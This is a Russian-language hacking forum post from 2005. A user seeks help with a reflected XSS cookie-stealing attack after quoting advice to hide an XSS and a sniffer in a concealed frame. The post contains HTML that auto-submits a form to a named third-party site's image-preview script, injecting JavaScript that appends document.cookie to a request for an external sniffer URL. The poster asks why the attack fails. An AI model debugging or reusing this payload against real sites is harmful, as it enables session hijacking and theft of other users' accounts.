22.11.2005, 22:24
|
|
Banned
Регистрация: 05.10.2005
Сообщений: 965
С нами:
10840706
Репутация:
547
|
|
Сообщение от k1b0rg
на почитай
http://dante.net.ru/forum/printthread.php?t=225
а так общий вид сводиться к тому, что имеется допустим твоя страничка, ставишь на нее два фрейма, один скрытый, в него помещаешь xss пасивную и сниффер.
это я тебе на "пальцах объяснил" -------------------------------------------------------------------
Вот прочитал статью и сделал всё как тама :
Код HTML:
<html>
<body onload="document.forms['snif'].submit()">
<form name="snif" action="http://www.mix.az/engine/modules/imagepreview.php?image=');">
<input type="text" name="word" value="<script>img = new Image();
img.src='http://antichat.ru/cgi-bin/s.jpg'+document.cookie;</script>">
</form>
---------------------------------------------------------------------
Сохранил всё на ХТМЛ, и поместил у себя на сайте,открыл эту страничку , алерт не кидает, и на лог снифера нечего не идёт , почему , что я так не делаю под правь меня?
|
|
|